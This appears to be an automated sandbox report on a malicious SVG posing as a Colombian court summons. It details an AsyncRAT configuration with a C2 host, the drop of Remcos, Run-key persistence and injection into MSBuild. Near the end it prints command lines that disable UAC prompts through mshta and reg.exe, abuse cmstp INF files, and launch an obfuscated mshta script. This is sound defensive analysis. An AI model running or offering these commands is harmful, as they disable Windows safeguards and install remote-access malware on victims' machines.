Analysis
-
max time kernel
298s -
max time network
301s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
25-07-2024 23:17
Static task
static1
Behavioral task
behavioral1
Sample
78-CITACION DEMANDA EN SU CONTRA -JUZGADO LABORAL 04 CIRCUITO ESPECIALIZADO EXTINXION-54.svg
Resource
win10v2004-20240709-en
Behavioral task
behavioral2
Sample
78-CITACION DEMANDA EN SU CONTRA -JUZGADO LABORAL 04 CIRCUITO ESPECIALIZADO EXTINXION-54.svg
Resource
win11-20240709-en
General
-
Target
78-CITACION DEMANDA EN SU CONTRA -JUZGADO LABORAL 04 CIRCUITO ESPECIALIZADO EXTINXION-54.svg
-
Size
365KB
-
MD5
80193d67d0da94a9d928fe4bc5b3a7cc
-
SHA1
ec3b1f52e184dd87dfe9ceb2eb5cdca6f96f5dc4
-
SHA256
6e6577761b13f6a42f212419a8fcca10f35ab9315f24e9be39c8fc5cdfcfea10
-
SHA512
b376e9152c6ec0b45d8e9fa7d4f298a8ddf2d873c3b42b3f7d60704dbef3c7a4967a6e32fef5cd8fa0019bd6176401c2b8fcc0698437c2ae8082bfacb9088957
-
SSDEEP
3072:RCkLBpCoMXyV1d/Cl+XlwdgrJGwS4BHKlgeJtonukwUwPsWw5wzwQw6qmPwOhuqZ:RfBpCoK21dE+XlpJGwSsKldhLsuCY
Malware Config
Extracted
asyncrat
| CRACKED BY https://t.me/xworm_v2
Default
melo2024.kozow.com:8000
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_file
AnsyFelix
-
install_folder
%AppData%
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation lcszns.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 3 IoCs
pid Process 5932 01 NOTIFICACION DEMANDA..exe 5720 lcszns.exe 5040 remcos.exe -
Loads dropped DLL 6 IoCs
pid Process 5932 01 NOTIFICACION DEMANDA..exe 5932 01 NOTIFICACION DEMANDA..exe 5932 01 NOTIFICACION DEMANDA..exe 5932 01 NOTIFICACION DEMANDA..exe 5932 01 NOTIFICACION DEMANDA..exe 5932 01 NOTIFICACION DEMANDA..exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-75LK5A = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" lcszns.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-75LK5A = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" remcos.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-75LK5A = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" remcos.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-75LK5A = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" lcszns.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 5932 set thread context of 5760 5932 01 NOTIFICACION DEMANDA..exe 115 PID 5760 set thread context of 5740 5760 cmd.exe 126 -
pid Process 972 powershell.exe 5648 powershell.exe 5552 powershell.exe 1636 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 38 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmstp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language remcos.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmstp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmstp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmstp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmstp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lcszns.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmstp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 01 NOTIFICACION DEMANDA..exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe -
Kills process with taskkill 6 IoCs
pid Process 3168 taskkill.exe 5624 taskkill.exe 1108 taskkill.exe 5720 taskkill.exe 3680 taskkill.exe 5680 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings firefox.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 5656 reg.exe -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\Downloads\01-CITACION DEMANDA EN SU CONTRA -JUZGADO PENAL 01 CIRCUITO ESPECIALIZADO EXTINXION-01.zip:Zone.Identifier firefox.exe -
Suspicious behavior: EnumeratesProcesses 46 IoCs
pid Process 5932 01 NOTIFICACION DEMANDA..exe 5932 01 NOTIFICACION DEMANDA..exe 5932 01 NOTIFICACION DEMANDA..exe 5760 cmd.exe 5760 cmd.exe 5760 cmd.exe 5760 cmd.exe 5740 MSBuild.exe 5740 MSBuild.exe 5072 powershell.exe 5072 powershell.exe 5072 powershell.exe 5072 powershell.exe 972 powershell.exe 972 powershell.exe 972 powershell.exe 5892 powershell.exe 5892 powershell.exe 5892 powershell.exe 5892 powershell.exe 972 powershell.exe 5648 powershell.exe 5648 powershell.exe 5648 powershell.exe 2376 powershell.exe 2376 powershell.exe 2376 powershell.exe 2376 powershell.exe 5648 powershell.exe 5552 powershell.exe 5552 powershell.exe 5552 powershell.exe 1572 powershell.exe 1572 powershell.exe 1572 powershell.exe 1572 powershell.exe 5552 powershell.exe 1636 powershell.exe 1636 powershell.exe 1636 powershell.exe 5860 powershell.exe 5860 powershell.exe 5860 powershell.exe 5860 powershell.exe 1636 powershell.exe 5740 MSBuild.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 5932 01 NOTIFICACION DEMANDA..exe 5760 cmd.exe 5760 cmd.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
description pid Process Token: SeDebugPrivilege 4276 firefox.exe Token: SeDebugPrivilege 4276 firefox.exe Token: SeDebugPrivilege 4276 firefox.exe Token: SeRestorePrivilege 5724 7zG.exe Token: 35 5724 7zG.exe Token: SeSecurityPrivilege 5724 7zG.exe Token: SeSecurityPrivilege 5724 7zG.exe Token: SeDebugPrivilege 4276 firefox.exe Token: SeDebugPrivilege 4276 firefox.exe Token: SeDebugPrivilege 4276 firefox.exe Token: SeDebugPrivilege 5740 MSBuild.exe Token: SeDebugPrivilege 5680 taskkill.exe Token: SeDebugPrivilege 5072 powershell.exe Token: SeDebugPrivilege 3168 taskkill.exe Token: SeDebugPrivilege 5624 taskkill.exe Token: SeDebugPrivilege 972 powershell.exe Token: SeDebugPrivilege 5892 powershell.exe Token: SeDebugPrivilege 1108 taskkill.exe Token: SeDebugPrivilege 5648 powershell.exe Token: SeDebugPrivilege 2376 powershell.exe Token: SeDebugPrivilege 5720 taskkill.exe Token: SeDebugPrivilege 5552 powershell.exe Token: SeDebugPrivilege 1572 powershell.exe Token: SeDebugPrivilege 3680 taskkill.exe Token: SeDebugPrivilege 1636 powershell.exe Token: SeDebugPrivilege 5860 powershell.exe Token: SeDebugPrivilege 4276 firefox.exe -
Suspicious use of FindShellTrayWindow 22 IoCs
pid Process 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 5724 7zG.exe -
Suspicious use of SendNotifyMessage 20 IoCs
pid Process 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 4276 firefox.exe 5740 MSBuild.exe 5040 remcos.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1656 wrote to memory of 4276 1656 firefox.exe 84 PID 1656 wrote to memory of 4276 1656 firefox.exe 84 PID 1656 wrote to memory of 4276 1656 firefox.exe 84 PID 1656 wrote to memory of 4276 1656 firefox.exe 84 PID 1656 wrote to memory of 4276 1656 firefox.exe 84 PID 1656 wrote to memory of 4276 1656 firefox.exe 84 PID 1656 wrote to memory of 4276 1656 firefox.exe 84 PID 1656 wrote to memory of 4276 1656 firefox.exe 84 PID 1656 wrote to memory of 4276 1656 firefox.exe 84 PID 1656 wrote to memory of 4276 1656 firefox.exe 84 PID 1656 wrote to memory of 4276 1656 firefox.exe 84 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 4860 4276 firefox.exe 85 PID 4276 wrote to memory of 3180 4276 firefox.exe 86 PID 4276 wrote to memory of 3180 4276 firefox.exe 86 PID 4276 wrote to memory of 3180 4276 firefox.exe 86 PID 4276 wrote to memory of 3180 4276 firefox.exe 86 PID 4276 wrote to memory of 3180 4276 firefox.exe 86 PID 4276 wrote to memory of 3180 4276 firefox.exe 86 PID 4276 wrote to memory of 3180 4276 firefox.exe 86 PID 4276 wrote to memory of 3180 4276 firefox.exe 86 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\78-CITACION DEMANDA EN SU CONTRA -JUZGADO LABORAL 04 CIRCUITO ESPECIALIZADO EXTINXION-54.svg"1⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\78-CITACION DEMANDA EN SU CONTRA -JUZGADO LABORAL 04 CIRCUITO ESPECIALIZADO EXTINXION-54.svg"2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1960 -parentBuildID 20240401114208 -prefsHandle 1880 -prefMapHandle 1872 -prefsLen 25753 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e22c82bd-3cef-4a47-b91c-7137433b041a} 4276 "\\.\pipe\gecko-crash-server-pipe.4276" gpu3⤵PID:4860
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2400 -parentBuildID 20240401114208 -prefsHandle 2376 -prefMapHandle 2364 -prefsLen 26673 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aaa8a156-4e58-4130-8f9a-634161425b4d} 4276 "\\.\pipe\gecko-crash-server-pipe.4276" socket3⤵PID:3180
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2832 -childID 1 -isForBrowser -prefsHandle 2576 -prefMapHandle 1076 -prefsLen 26814 -prefMapSize 244658 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7dc9d947-fd55-4831-a959-52431b5bfcc6} 4276 "\\.\pipe\gecko-crash-server-pipe.4276" tab3⤵PID:1244
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3512 -childID 2 -isForBrowser -prefsHandle 3592 -prefMapHandle 3588 -prefsLen 31163 -prefMapSize 244658 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f55f9e97-7f74-42b6-8bca-a7d2e9296496} 4276 "\\.\pipe\gecko-crash-server-pipe.4276" tab3⤵PID:2220
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4704 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4728 -prefMapHandle 4724 -prefsLen 31163 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bb42dcb0-6ffa-4315-b706-f5515d7bfda9} 4276 "\\.\pipe\gecko-crash-server-pipe.4276" utility3⤵
- Checks processor information in registry
PID:3764
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5336 -childID 3 -isForBrowser -prefsHandle 5432 -prefMapHandle 5448 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f9b4a54-6c9e-44ec-bfeb-d826ee103fb3} 4276 "\\.\pipe\gecko-crash-server-pipe.4276" tab3⤵PID:3592
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5660 -childID 4 -isForBrowser -prefsHandle 5580 -prefMapHandle 5584 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f39fdb40-4810-4c74-b0ff-4c83bf86d3ea} 4276 "\\.\pipe\gecko-crash-server-pipe.4276" tab3⤵PID:1564
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5776 -childID 5 -isForBrowser -prefsHandle 5856 -prefMapHandle 5852 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b97837db-9236-4314-b46c-e7bc2a9cba46} 4276 "\\.\pipe\gecko-crash-server-pipe.4276" tab3⤵PID:5048
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6044 -childID 6 -isForBrowser -prefsHandle 6104 -prefMapHandle 5804 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7f61772-80bd-4522-aec9-039841f4b440} 4276 "\\.\pipe\gecko-crash-server-pipe.4276" tab3⤵PID:3144
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5644
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\01-CITACION DEMANDA EN SU CONTRA -JUZGADO PENAL 01 CIRCUITO ESPECIALIZADO EXTINXION-01\" -ad -an -ai#7zMap24704:234:7zEvent106251⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5724
-
C:\Users\Admin\Downloads\01-CITACION DEMANDA EN SU CONTRA -JUZGADO PENAL 01 CIRCUITO ESPECIALIZADO EXTINXION-01\01-CITACION DEMANDA EN SU CONTRA -JUZGADO PENAL 01 CIRCUITO ESPECIALIZADO EXTINXION-01\01 NOTIFICACION DEMANDA..exe"C:\Users\Admin\Downloads\01-CITACION DEMANDA EN SU CONTRA -JUZGADO PENAL 01 CIRCUITO ESPECIALIZADO EXTINXION-01\01-CITACION DEMANDA EN SU CONTRA -JUZGADO PENAL 01 CIRCUITO ESPECIALIZADO EXTINXION-01\01 NOTIFICACION DEMANDA..exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5932 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5760 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5740 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /im cmstp.exe /f4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5680
-
-
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\lqjlbqfj.inf4⤵
- System Location Discovery: System Language Discovery
PID:4900
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /im cmstp.exe /f4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3168
-
-
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\eoy4thet.inf4⤵
- System Location Discovery: System Language Discovery
PID:5836
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /im cmstp.exe /f4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5624
-
-
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\ddcsosmw.inf4⤵
- System Location Discovery: System Language Discovery
PID:2092
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /im cmstp.exe /f4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1108
-
-
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\2myzeywi.inf4⤵
- System Location Discovery: System Language Discovery
PID:1736
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /im cmstp.exe /f4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5720
-
-
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\omir0303.inf4⤵
- System Location Discovery: System Language Discovery
PID:1708
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /im cmstp.exe /f4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
-
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\5sfy5aql.inf4⤵
- System Location Discovery: System Language Discovery
PID:5544
-
-
C:\Users\Admin\AppData\Local\Temp\lcszns.exe"C:\Users\Admin\AppData\Local\Temp\lcszns.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:5720 -
C:\ProgramData\Remcos\remcos.exe"C:\ProgramData\Remcos\remcos.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5040
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- System Location Discovery: System Language Discovery
PID:1248 -
C:\Windows\SysWOW64\mshta.exemshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"", 0, true:close")2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1528 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5656
-
-
-
C:\Windows\SysWOW64\mshta.exemshta vbscript:Execute("CreateObject(ChrW(87) + ChrW(83) + ChrW(99) + ChrW(114) + ChrW(105) + ChrW(112) + ChrW(116) + ChrW(46) + ChrW(83) + ChrW(104) + ChrW(101) + ChrW(108) + ChrW(108)).Run ""powershell.exe Stop-Process -Name 'cmstp'"", 0, true:close")2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2244 -
